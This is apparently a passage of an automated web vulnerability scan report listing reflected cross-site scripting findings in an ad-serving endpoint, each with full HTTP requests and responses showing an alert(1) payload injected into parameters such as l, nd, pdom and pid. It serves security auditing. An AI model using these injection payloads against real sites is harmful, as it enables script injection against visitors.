GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cna34fd"-alert(1)-"bc95ae28570&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
ick.net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cna34fd"-alert(1)-"bc95ae28570&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.
...[SNIP]...

1.36. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ec90"-alert(1)-"2a0e5843a31 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US1ec90"-alert(1)-"2a0e5843a31&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
h%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US1ec90"-alert(1)-"2a0e5843a31&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI
...[SNIP]...

1.37. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c30a"-alert(1)-"784b7949c15 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=270809c30a"-alert(1)-"784b7949c15&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=270809c30a"-alert(1)-"784b7949c15&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11
...[SNIP]...

1.38. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 720cf"-alert(1)-"0b86199db39 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a720cf"-alert(1)-"0b86199db39&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a720cf"-alert(1)-"0b86199db39&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121
...[SNIP]...

1.39. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bef2"-alert(1)-"ffd927cd787 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=6bef2"-alert(1)-"ffd927cd787&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=6bef2"-alert(1)-"ffd927cd787&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_sourc
...[SNIP]...

1.40. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4a7c"-alert(1)-"431c9d2872f was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.comb4a7c"-alert(1)-"431c9d2872f&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.comb4a7c"-alert(1)-"431c9d2872f&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=e
...[SNIP]...

1.41. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bee6"-alert(1)-"81ed37232b7 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=21bee6"-alert(1)-"81ed37232b7&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=21bee6"-alert(1)-"81ed37232b7&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&p
...[SNIP]...

1.42. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 562b5"-alert(1)-"2c378b10046 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com562b5"-alert(1)-"2c378b10046&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com562b5"-alert(1)-"2c378b10046&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_med
...[SNIP]...

1.43. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae52"-alert(1)-"3dcf514d1d0 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFIfae52"-alert(1)-"3dcf514d1d0&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFIfae52"-alert(1)-"3dcf514d1d0&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;

...[SNIP]...

1.44. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab0ff"-alert(1)-"2a6292d3f6b was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=ab0ff"-alert(1)-"2a6292d3f6b&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=ab0ff"-alert(1)-"2a6292d3f6b&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.2
...[SNIP]...

1.45. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68308"-alert(1)-"d64be5ea104 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=10068308"-alert(1)-"d64be5ea104&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
